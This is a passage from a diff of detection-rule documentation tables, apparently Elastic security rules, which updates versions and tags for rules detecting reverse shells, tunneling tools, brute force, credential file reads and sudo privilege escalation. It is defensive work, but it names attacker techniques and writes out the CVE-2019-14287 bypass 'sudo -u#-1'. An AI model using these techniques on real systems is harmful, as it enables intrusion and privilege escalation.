|8.3.0 |106 +|<<potential-protocol-tunneling-via-chisel-server, Potential Protocol Tunneling via Chisel Server>> |This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-pspy-process-monitoring-detected, Potential Pspy Process Monitoring Detected>> |This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery] |8.3.0 |2 +|<<potential-protocol-tunneling-via-earthworm, Potential Protocol Tunneling via EarthWorm>> |Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-remote-code-execution-via-web-server, Potential Remote Code Execution via Web Server>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-pspy-process-monitoring-detected, Potential Pspy Process Monitoring Detected>> |This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery] |8.3.0 |3 + +|<<potential-remote-code-execution-via-web-server, Potential Remote Code Execution via Web Server>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 |<<potential-remote-credential-access-via-registry, Potential Remote Credential Access via Registry>> |Identifies remote access to the registry to potentially dump credential data from the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 -|<<potential-remote-desktop-shadowing-activity, Potential Remote Desktop Shadowing Activity>> |Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-remote-desktop-shadowing-activity, Potential Remote Desktop Shadowing Activity>> |Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 + +|<<potential-remote-desktop-tunneling-detected, Potential Remote Desktop Tunneling Detected>> |Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-remote-desktop-tunneling-detected, Potential Remote Desktop Tunneling Detected>> |Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-remote-file-execution-via-msiexec, Potential Remote File Execution via MSIEXEC>> |Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-reverse-shell, Potential Reverse Shell>> |This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell, Potential Reverse Shell>> |This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-reverse-shell-activity-via-terminal, Potential Reverse Shell Activity via Terminal>> |Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-reverse-shell-activity-via-terminal, Potential Reverse Shell Activity via Terminal>> |Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-reverse-shell-via-background-process, Potential Reverse Shell via Background Process>> |Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-reverse-shell-via-background-process, Potential Reverse Shell via Background Process>> |Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-reverse-shell-via-java, Potential Reverse Shell via Java>> |This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-reverse-shell-via-java, Potential Reverse Shell via Java>> |This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-reverse-shell-via-suspicious-binary, Potential Reverse Shell via Suspicious Binary>> |This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell-via-suspicious-binary, Potential Reverse Shell via Suspicious Binary>> |This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-reverse-shell-via-suspicious-child-process, Potential Reverse Shell via Suspicious Child Process>> |This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell-via-suspicious-child-process, Potential Reverse Shell via Suspicious Child Process>> |This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-reverse-shell-via-suspicious-parent-process, Potential Reverse Shell via Suspicious Parent Process>> |This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell-via-udp, Potential Reverse Shell via UDP>> |This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |2 -|<<potential-reverse-shell-via-udp, Potential Reverse Shell via UDP>> |This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |1 +|<<potential-ssh-it-ssh-worm-downloaded, Potential SSH-IT SSH Worm Downloaded>> |Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Data Source: Elastic Endgame] |8.3.0 |1 -|<<potential-syn-based-network-scan-detected, Potential SYN-Based Network Scan Detected>> |This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |3 +|<<potential-syn-based-network-scan-detected, Potential SYN-Based Network Scan Detected>> |This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |4 -|<<potential-secure-file-deletion-via-sdelete-utility, Potential Secure File Deletion via SDelete Utility>> |Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-secure-file-deletion-via-sdelete-utility, Potential Secure File Deletion via SDelete Utility>> |Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Impact], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<potential-shadow-credentials-added-to-ad-object, Potential Shadow Credentials added to AD Object>> |Identify the modification of the msDS-KeyCredentialLink attribute in an Active Directory Computer or User Object. Attackers can abuse control over the object and create a key pair, append to raw public key in the attribute, and obtain persistent and stealthy access to the target user or computer object. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |106 -|<<potential-shadow-file-read-via-command-line-utilities, Potential Shadow File Read via Command Line Utilities>> |Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |106 +|<<potential-shadow-file-read-via-command-line-utilities, Potential Shadow File Read via Command Line Utilities>> |Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |107 |<<potential-sharprdp-behavior, Potential SharpRDP Behavior>> |Identifies potential behavior of SharpRDP, which is a tool that can be used to perform authenticated command execution against a remote target via Remote Desktop Protocol (RDP) for the purposes of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<potential-shell-via-wildcard-injection-detected, Potential Shell via Wildcard Injection Detected>> |This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-shell-via-wildcard-injection-detected, Potential Shell via Wildcard Injection Detected>> |This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-successful-linux-ftp-brute-force-attack-detected, Potential Successful Linux FTP Brute Force Attack Detected>> |An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |2 +|<<potential-successful-linux-ftp-brute-force-attack-detected, Potential Successful Linux FTP Brute Force Attack Detected>> |An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |3 -|<<potential-successful-linux-rdp-brute-force-attack-detected, Potential Successful Linux RDP Brute Force Attack Detected>> |An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |2 +|<<potential-successful-linux-rdp-brute-force-attack-detected, Potential Successful Linux RDP Brute Force Attack Detected>> |An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |3 -|<<potential-successful-ssh-brute-force-attack, Potential Successful SSH Brute Force Attack>> |Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |7 +|<<potential-successful-ssh-brute-force-attack, Potential Successful SSH Brute Force Attack>> |Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |8 -|<<potential-sudo-hijacking-detected, Potential Sudo Hijacking Detected>> |Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-sudo-hijacking-detected, Potential Sudo Hijacking Detected>> |Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |103 -|<<potential-sudo-privilege-escalation-via-cve-2019-14287, Potential Sudo Privilege Escalation via CVE-2019-14287>> |This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Use Case: Vulnerability] |8.3.0 |1 +|<<potential-sudo-privilege-escalation-via-cve-2019-14287, Potential Sudo Privilege Escalation via CVE-2019-14287>> |This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Use Case: Vulnerability] |8.3.0 |2 -|<<potential-sudo-token-manipulation-via-process-injection, Potential Sudo Token Manipulation via Process Injection>> |This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-sudo-token-manipulation-via-process-injection, Potential Sudo Token Manipulation via Process Injection>> |This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |3 |<<potential-suspicious-clipboard-activity-detected, Potential Suspicious Clipboard Activity Detected>> |This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group leader. Adversaries may collect data stored in the clipboard from users copying information within or between applications. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Rule Type: BBR], [Data Source: Elastic Defend] |8.6.0 |2 -|<<potential-suspicious-debugfs-root-device-access, Potential Suspicious DebugFS Root Device Access>> |This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-suspicious-debugfs-root-device-access, Potential Suspicious DebugFS Root Device Access>> |This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 + +|<<potential-suspicious-file-edit, Potential Suspicious File Edit>> |This rule monitors for the potential edit of a suspicious file. In Linux, when editing a file through an editor, a temporary .swp file is created. By monitoring for the creation of this .swp file, we can detect potential file edits of suspicious files. The execution of this rule is not a clear sign of the file being edited, as just opening the file through an editor will trigger this event. Attackers may alter any of the files added in this rule to establish persistence, escalate privileges or perform reconnaisance on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-suspicious-file-edit, Potential Suspicious File Edit>> |This rule monitors for the potential edit of a suspicious file. In Linux, when editing a file through an editor, a temporary .swp file is created. By monitoring for the creation of this .swp file, we can detect potential file edits of suspicious files. The execution of this rule is not a clear sign of the file being edited, as just opening the file through an editor will trigger this event. Attackers may alter any of the files added in this rule to establish persistence, escalate privileges or perform reconnaisance on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-unauthorized-access-via-wildcard-injection-detected, Potential Unauthorized Access via Wildcard Injection Detected>> |This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-unauthorized-access-via-wildcard-injection-detected, Potential Unauthorized Access via Wildcard Injection Detected>> |This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-upgrade-of-non-interactive-shell, Potential Upgrade of Non-interactive Shell>> |Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-windows-error-manager-masquerading, Potential Windows Error Manager Masquerading>> |Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-windows-error-manager-masquerading, Potential Windows Error Manager Masquerading>> |Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-curl-cve-2023-38545-exploitation, Potential curl CVE-2023-38545 Exploitation>> |Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |1 +|<<potential-curl-cve-2023-38545-exploitation, Potential curl CVE-2023-38545 Exploitation>> |Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |2 |<<potential-macos-ssh-brute-force-detected, Potential macOS SSH Brute Force Detected>> |Identifies a high number (20) of macOS SSH KeyGen process executions from the same host. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |105 @@ -1276,7 +1326,7 @@ and their rule type is `machine_learning`. |<<powershell-kerberos-ticket-request, PowerShell Kerberos Ticket Request>> |Detects PowerShell scripts that have the capability of requesting kerberos tickets, which is a common step in Kerberoasting toolkits to crack service accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 -|<<powershell-keylogging-script, PowerShell Keylogging Script>> |Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 +|<<powershell-keylogging-script, PowerShell Keylogging Script>> 